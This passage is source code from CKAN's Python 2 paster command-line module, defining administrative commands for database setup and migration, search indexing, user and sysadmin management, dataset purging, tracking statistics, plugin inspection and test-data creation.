(e.g. "Perform commands to set up the datastore")
'''
class PasterClickGroup(click.Group):
'''A click.Group that may be called like a paster command'''
def __call__(self, ignored_command):
sys.argv.remove(ignored_command)
return super(PasterClickGroup, self).__call__(
prog_name=u'paster ' + ignored_command,
help_option_names=[u'-h', u'--help'],
obj={})
@click.group(cls=PasterClickGroup)
@click.option(
'--plugin',
metavar='ckan',
help='paster plugin (when run outside ckan directory)')
@click_config_option
@click.pass_context
def cli(ctx, plugin, config):
ctx.obj['config'] = config
cli.summary = summary
cli.group_name = u'ckan'
return cli
# common definition for paster ... --config
click_config_option = click.option(
'-c',
'--config',
default=None,
metavar='CONFIG',
help=u'Config file to use (default: development.ini)')
class CkanCommand(paste.script.command.Command):
'''Base class for classes that implement CKAN paster commands to inherit.'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _load_config(self, load_site_user=True):
load_config(self.options.config, load_site_user)
def _setup_app(self):
cmd = paste.script.appinstall.SetupCommand('setup-app')
cmd.run([self.filename])
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean - clears db (including dropping tables) and
search index
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file [DEPRECATED]
db load FILE_PATH - load a pg_dump from a file [DEPRECATED]
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing [DEPRECATED]
db create-from-model - create database from the model (indexes not made)
db migrate-filestore - migrate all uploaded data from the 2.1 filestore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
cmd = self.args[0]
self._load_config(cmd!='upgrade')
import ckan.model as model
import ckan.lib.search as search
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print 'Initialising DB: SUCCESS'
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear_all()
if self.verbose:
print 'Cleaning DB: SUCCESS'
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print 'Creating DB: SUCCESS'
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
error('Command %s not recognized' % cmd)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print 'Dumped database to: %s' % filepath
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print 'Loaded CKAN database: %s' % filepath
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
deprecation_warning(u"Use PostgreSQL's pg_dump instead.")
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_dump(dump_path)
def load(self, only_load=False):
deprecation_warning(u"Use PostgreSQL's pg_restore instead.")
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_load(dump_path)
if not only_load:
print 'Upgrading DB'
import ckan.model as model
model.repo.upgrade_db()
print 'Rebuilding search index'
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print 'Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.'
print 'Done'
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print "failed to fetch %s (code %s)" % (url,
response.status_code)
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError, e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = :id", {'id': id})
Session.execute("update resource_revision set url_type = 'upload'"
"where id = :id and "
"revision_id = :revision_id",
{'id': id, 'revision_id': revision_id})
Session.commit()
print "Saved url %s" % url
def version(self):
from ckan.model import Session
print Session.execute('select version from migrate_version;').fetchall()
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] [-q] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex using multiprocessing using all cores.
This acts in the same way as rebuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self, name):
super(SearchIndexCommand, self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False,
help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False,
help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False,
help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-q', '--quiet', dest='quiet',
action='store_true', default=False,
help='Do not output index rebuild progress')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
immediately available on the search, but slows significantly the process.
Default is false.''')
def command(self):
if not self.args:
# default to printing help
print self.usage
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print 'Command %s not recognized' % cmd
def rebuild(self):
from ckan.lib.search import rebuild, commit
# By default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each),
quiet=self.options.quiet)
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print 'Missing parameter: dataset-name'
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear, clear_all
package_id = self.args[1] if len(self.args) > 1 else None
if not package_id:
clear_all()
else:
clear(package_id)
def rebuild_fast(self):
### Get out config but without starting pylons environment ####
conf = self._get_config()
### Get ids using own engine, otherwise multiprocess will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
## load the actual environment for each subprocess, so each has its own
## sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
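## e.g. chunks(range(10), 3) gives newn == 3 and yields [0, 1, 2], [3, 4, 5] and then
## the remainder [6, 7, 8, 9] as the final chunk.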
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print 'Command %s not recognized' % cmd
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print RDFExport.__doc__
else:
self.export_datasets(self.args[0])
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
import urlparse
import urllib2
from ckan.common import config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir(out_folder):
os.makedirs(out_folder)
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id': dataset_name})
if not dd['state'] == 'active':
continue
url = h.url_for(controller='package', action='read', id=dd['name'])
url = urlparse.urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join(out_folder, dd['name']) + ".rdf"
try:
r = urllib2.urlopen(url).read()
except urllib2.HTTPError, e:
if e.code == 404:
error('Please install ckanext-dcat and enable the ' +
'`dcat` plugin to use the RDF serializations')
with open(fname, 'wb') as f:
f.write(r)
except IOError, ioe:
sys.stderr.write(str(ioe) + "\n")
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - make an existing user into a sysadmin
sysadmin add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- creates a new user that is a sysadmin
(prompts for password and email if not
supplied).
Field can be: apikey
password
email
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
cmd = self.args[0] if self.args else None
if cmd is None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print 'Command %s not recognized' % cmd
def list(self):
import ckan.model as model
print 'Sysadmins:'
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True,
state='active')
print 'count = %i' % sysadmins.count()
for sysadmin in sysadmins:
print '%s name=%s email=%s id=%s' % (
sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.email,
sysadmin.id)
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'User "%s" not found' % username
makeuser = raw_input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
user_add(self.args[1:])
user = model.User.by_name(unicode(username))
else:
print 'Exiting ...'
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print 'Added %s as sysadmin' % username
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to remove sysadmin rights from.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for email and
password if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print 'Users:'
users = model.Session.query(model.User).filter_by(state='active')
print 'count = %i' % users.count()
for user in users:
print self.get_user_str(user)
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(unicode(username))
print 'User: \n', user
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print 'Done'
def search(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need user name query string.'
return
query_str = self.args[1]
query = model.User.search(query_str)
print '%i users matching %r:' % (query.count(), query_str)
for user in query.all():
print self.get_user_str(user)
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
error('Passwords do not match')
return password1
def add(self):
user_add(self.args[1:])
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
p.toolkit.get_action('user_delete')(
{'model': model, 'ignore_auth': True},
{'id': username})
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
if not self.args:
print self.usage
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print 'Datasets:'
datasets = model.Session.query(model.Package)
print 'count = %i' % datasets.count()
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' else ''
print '%s %s %s' % (dataset.id, dataset.name, state)
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(unicode(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print '%s %s -> %s' % (dataset.name, old_state, dataset.state)
def purge(self, dataset_ref):
import ckan.logic as logic
dataset = self._get_dataset(dataset_ref)
name = dataset.name
site_user = logic.get_action('get_site_user')({'ignore_auth': True}, {})
context = {'user': site_user['name']}
logic.get_action('dataset_purge')(
context, {'id': dataset_ref})
print '%s purged' % name
class Celery(CkanCommand):
'''Celery daemon [DEPRECATED]
This command is DEPRECATED, use `paster jobs` instead.
Usage:
celeryd <run> - run the celery daemon
celeryd run concurrency - run the celery daemon with
argument 'concurrency'
celeryd view - view all tasks in the queue
celeryd clean - delete all tasks in the queue
'''
min_args = 0
max_args = 2
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
if not self.args:
self.run_()
else:
cmd = self.args[0]
if cmd == 'run':
self.run_()
elif cmd == 'view':
self.view()
elif cmd == 'clean':
self.clean()
else:
error('Command %s not recognized' % cmd)
def run_(self):
deprecation_warning(u'Use `paster jobs worker` instead.')
default_ini = os.path.join(os.getcwd(), 'development.ini')
if self.options.config:
os.environ['CKAN_CONFIG'] = os.path.abspath(self.options.config)
elif os.path.isfile(default_ini):
os.environ['CKAN_CONFIG'] = default_ini
else:
error('No .ini specified and none was found in current directory')
from ckan.lib.celery_app import celery
celery_args = []
if len(self.args) == 2 and self.args[1] == 'concurrency':
            celery_args.append('--concurrency=1')
celery.worker_main(argv=['celeryd', '--loglevel=INFO'] + celery_args)
def view(self):
deprecation_warning(u'Use `paster jobs list` instead.')
self._load_config()
import ckan.model as model
from kombu.transport.sqlalchemy.models import Message
q = model.Session.query(Message)
q_visible = q.filter_by(visible=True)
print '%i messages (total)' % q.count()
print '%i visible messages' % q_visible.count()
for message in q:
if message.visible:
print '%i: Visible' % (message.id)
else:
print '%i: Invisible Sent:%s' % (message.id, message.sent_at)
def clean(self):
deprecation_warning(u'Use `paster jobs clear` instead.')
self._load_config()
import ckan.model as model
query = model.Session.execute("select * from kombu_message")
tasks_initially = query.rowcount
if not tasks_initially:
print 'No tasks to delete'
sys.exit(0)
query = model.Session.execute("delete from kombu_message")
query = model.Session.execute("select * from kombu_message")
tasks_afterwards = query.rowcount
print '%i of %i tasks deleted' % (tasks_initially - tasks_afterwards,
tasks_initially)
if tasks_afterwards:
error('Failed to delete all tasks')
model.repo.commit_and_remove()
class Ratings(CkanCommand):
'''Manage the ratings stored in the db
Usage:
ratings count - counts ratings
ratings clean - remove all ratings
ratings clean-anonymous - remove only anonymous ratings
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0]
if cmd == 'count':
self.count()
elif cmd == 'clean':
self.clean()
elif cmd == 'clean-anonymous':
self.clean(user_ratings=False)
else:
print 'Command %s not recognized' % cmd
def count(self):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
        q = q.filter(model.Rating.user_id.is_(None))
print "of which %i are anonymous ratings" % q.count()
def clean(self, user_ratings=True):
import ckan.model as model
q = model.Session.query(model.Rating)
print "%i ratings" % q.count()
if not user_ratings:
            q = q.filter(model.Rating.user_id.is_(None))
print "of which %i are anonymous ratings" % q.count()
ratings = q.all()
for rating in ratings:
rating.purge()
model.repo.commit_and_remove()
## Used by the Tracking class
_ViewCount = collections.namedtuple("ViewCount", "id name count")
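# e.g. _ViewCount(id=u'123-abc', name=u'some-dataset', count=42)
# (illustrative values only; real ids and counts come from the SQL queries
# in the Tracking class below)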
class Tracking(CkanCommand):
'''Update tracking statistics
Usage:
tracking update [start_date] - update tracking stats
tracking export FILE [start_date] - export tracking stats to a csv file
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
engine = model.meta.engine
cmd = self.args[0]
if cmd == 'update':
start_date = self.args[1] if len(self.args) > 1 else None
self.update_all(engine, start_date)
elif cmd == 'export':
if len(self.args) <= 1:
error(self.__class__.__doc__)
output_file = self.args[1]
start_date = self.args[2] if len(self.args) > 2 else None
self.update_all(engine, start_date)
self.export_tracking(engine, output_file)
else:
error(self.__class__.__doc__)
def update_all(self, engine, start_date=None):
if start_date:
start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d')
else:
            # No date given. See when we last had data and start from 2 days
            # before that, in case new data has since arrived for those days.
            # If there is no existing data, use 2011-01-01 as the start date.
sql = '''SELECT tracking_date from tracking_summary
ORDER BY tracking_date DESC LIMIT 1;'''
result = engine.execute(sql).fetchall()
if result:
start_date = result[0]['tracking_date']
start_date += datetime.timedelta(-2)
# convert date to datetime
combine = datetime.datetime.combine
start_date = combine(start_date, datetime.time(0))
else:
start_date = datetime.datetime(2011, 1, 1)
start_date_solrsync = start_date
end_date = datetime.datetime.now()
while start_date < end_date:
stop_date = start_date + datetime.timedelta(1)
self.update_tracking(engine, start_date)
print 'tracking updated for %s' % start_date
start_date = stop_date
self.update_tracking_solr(engine, start_date_solrsync)
def _total_views(self, engine):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql).fetchall()]
def _recent_views(self, engine, measure_from):
sql = '''
SELECT p.id,
p.name,
COALESCE(SUM(s.count), 0) AS total_views
FROM package AS p
LEFT OUTER JOIN tracking_summary AS s ON s.package_id = p.id
WHERE s.tracking_date >= %(measure_from)s
GROUP BY p.id, p.name
ORDER BY total_views DESC
'''
return [_ViewCount(*t) for t in engine.execute(sql, measure_from=str(measure_from)).fetchall()]
def export_tracking(self, engine, output_filename):
'''Write tracking summary to a csv file.'''
HEADINGS = [
"dataset id",
"dataset name",
"total views",
"recent views (last 2 weeks)",
]
measure_from = datetime.date.today() - datetime.timedelta(days=14)
recent_views = self._recent_views(engine, measure_from)
total_views = self._total_views(engine)
with open(output_filename, 'w') as fh:
f_out = csv.writer(fh)
f_out.writerow(HEADINGS)
recent_views_for_id = dict((r.id, r.count) for r in recent_views)
f_out.writerows([(r.id,
r.name,
r.count,
recent_views_for_id.get(r.id, 0))
for r in total_views])
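        # Illustrative output (values assumed, not from the original source):
        # a dataset with 120 total views, 7 of them in the last two weeks,
        # is written as a CSV row of the form
        #     <dataset id>,<dataset name>,120,7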
def update_tracking(self, engine, summary_date):
PACKAGE_URL = '/dataset/'
# clear out existing data before adding new
sql = '''DELETE FROM tracking_summary
WHERE tracking_date='%s'; ''' % summary_date
engine.execute(sql)
sql = '''SELECT DISTINCT url, user_key,
CAST(access_timestamp AS Date) AS tracking_date,
tracking_type INTO tracking_tmp
FROM tracking_raw
WHERE CAST(access_timestamp as Date)=%s;
INSERT INTO tracking_summary
(url, count, tracking_date, tracking_type)
SELECT url, count(user_key), tracking_date, tracking_type
FROM tracking_tmp
GROUP BY url, tracking_date, tracking_type;
DROP TABLE tracking_tmp;
COMMIT;'''
engine.execute(sql, summary_date)
# get ids for dataset urls
sql = '''UPDATE tracking_summary t
SET package_id = COALESCE(
(SELECT id FROM package p
WHERE p.name = regexp_replace(' ' || t.url, '^[ ]{1}(/\w{2}){0,1}' || %s, ''))
,'~~not~found~~')
WHERE t.package_id IS NULL
AND tracking_type = 'page';'''
engine.execute(sql, PACKAGE_URL)
# update summary totals for resources
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.url = t2.url
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'resource';'''
engine.execute(sql)
# update summary totals for pages
sql = '''UPDATE tracking_summary t1
SET running_total = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date
)
,recent_views = (
SELECT sum(count)
FROM tracking_summary t2
WHERE t1.package_id = t2.package_id
AND t2.tracking_date <= t1.tracking_date AND t2.tracking_date >= t1.tracking_date - 14
)
WHERE t1.running_total = 0 AND tracking_type = 'page'
AND t1.package_id IS NOT NULL
AND t1.package_id != '~~not~found~~';'''
engine.execute(sql)
def update_tracking_solr(self, engine, start_date):
sql = '''SELECT package_id FROM tracking_summary
where package_id!='~~not~found~~'
and tracking_date >= %s;'''
results = engine.execute(sql, start_date)
package_ids = set()
for row in results:
package_ids.add(row['package_id'])
total = len(package_ids)
not_found = 0
print '%i package index%s to be rebuilt starting from %s' % (total, '' if total < 2 else 'es', start_date)
from ckan.lib.search import rebuild
for package_id in package_ids:
try:
rebuild(package_id)
except logic.NotFound:
print "Error: package %s not found." % (package_id)
not_found += 1
except KeyboardInterrupt:
print "Stopped."
return
except:
raise
print 'search index rebuilding done.' + (' %i not found.' % (not_found) if not_found else "")
class PluginInfo(CkanCommand):
'''Provide info on installed plugins.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def command(self):
self.get_info()
def get_info(self):
''' print info about current plugins from the .ini file'''
import ckan.plugins as p
self._load_config()
interfaces = {}
plugins = {}
for name in dir(p):
item = getattr(p, name)
try:
if issubclass(item, p.Interface):
interfaces[item] = {'class': item}
except TypeError:
pass
for interface in interfaces:
for plugin in p.PluginImplementations(interface):
name = plugin.name
if name not in plugins:
plugins[name] = {'doc': plugin.__doc__,
'class': plugin,
'implements': []}
plugins[name]['implements'].append(interface.__name__)
for plugin in plugins:
p = plugins[plugin]
print plugin + ':'
print '-' * (len(plugin) + 1)
if p['doc']:
print p['doc']
print 'Implements:'
for i in p['implements']:
extra = None
if i == 'ITemplateHelpers':
extra = self.template_helpers(p['class'])
if i == 'IActions':
extra = self.actions(p['class'])
print ' %s' % i
if extra:
print extra
print
def actions(self, cls):
''' Return readable action function info. '''
actions = cls.get_actions()
return self.function_info(actions)
def template_helpers(self, cls):
''' Return readable helper function info. '''
helpers = cls.get_helpers()
return self.function_info(helpers)
def function_info(self, functions):
''' Take a dict of functions and output readable info '''
import inspect
output = []
for function_name in functions:
fn = functions[function_name]
args_info = inspect.getargspec(fn)
params = args_info.args
num_params = len(params)
if args_info.varargs:
params.append('*' + args_info.varargs)
if args_info.keywords:
params.append('**' + args_info.keywords)
if args_info.defaults:
offset = num_params - len(args_info.defaults)
for i, v in enumerate(args_info.defaults):
params[i + offset] = params[i + offset] + '=' + repr(v)
# is this a classmethod if so remove the first parameter
if inspect.ismethod(fn) and inspect.isclass(fn.__self__):
params = params[1:]
params = ', '.join(params)
output.append(' %s(%s)' % (function_name, params))
# doc string
if fn.__doc__:
bits = fn.__doc__.split('\n')
for bit in bits:
output.append(' %s' % bit)
return ('\n').join(output)
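    # Illustration (assumed example, not part of the original command): for a
    # helpers dict {'greet': greet} where
    #     def greet(name, greeting='hi'): '''Say hi.'''
    # function_info() returns roughly:
    #     greet(name, greeting='hi')
    #         Say hi.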
class CreateTestDataCommand(CkanCommand):
'''Create test data in the database.
Tests can also delete the created objects easily with the delete() method.
create-test-data - annakarenina and warandpeace
create-test-data search - realistic data to test search
create-test-data gov - government style data
create-test-data family - package relationships data
create-test-data user - create a user 'tester' with api key 'tester'
create-test-data translations - annakarenina, warandpeace, and some test
translations of terms
    create-test-data vocabs - annakarenina, warandpeace, and some test
vocabularies
create-test-data hierarchy - hierarchy of groups
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
self._setup_app()
from ckan import plugins
from create_test_data import CreateTestData
if self.args:
cmd = self.args[0]
else:
cmd = 'basic'
if self.verbose:
print 'Creating %s test data' % cmd
if cmd == 'basic':
CreateTestData.create_basic_test_data()
elif cmd == 'user':
CreateTestData.create_test_user()
print 'Created user %r with password %r and apikey %r' % ('tester',
'tester', 'tester')
elif cmd == 'search':
CreateTestData.create_search_test_data()
elif cmd == 'gov':
CreateTestData.create_gov_test_data()
elif cmd == 'family':
CreateTestData.create_family_test_data()
elif cmd == 'translations':
CreateTestData.create_translations_test_data()
elif cmd == 'vocabs':
CreateTestData.create_vocabs_test_data()
elif cmd == 'hierarchy':
CreateTestData.create_group_hierarchy_test_data()
else:
print 'Command %s not recognized' % cmd
raise NotImplementedError
if self.verbose:
print 'Creating %s test data: Complete!' % cmd
class Profile(CkanCommand):
'''Code speed profiler
Provide a ckan url and it will make the request and record
how long each function call took in a file that can be read
by pstats.Stats (command-line) or runsnakerun (gui).
Usage:
profile URL [username]
e.g. profile /data/search
    The result is saved in ckan.data.search.profile
To view the profile in runsnakerun:
runsnakerun ckan.data.search.profile
    Uses the cProfile module from the python standard library.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 1
def _load_config_into_test_app(self):
from paste.deploy import loadapp
import paste.fixture
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
wsgiapp = loadapp('config:' + self.filename)
self.app = paste.fixture.TestApp(wsgiapp)
def command(self):
self._load_config_into_test_app()
import paste.fixture
import cProfile
import re
url = self.args[0]
if self.args[1:]:
user = self.args[1]
else:
user = 'visitor'
def profile_url(url):
try:
res = self.app.get(url, status=[200],
extra_environ={'REMOTE_USER': user})
except paste.fixture.AppError:
print 'App error: ', url.strip()
except KeyboardInterrupt:
raise
except Exception:
error(traceback.format_exc())
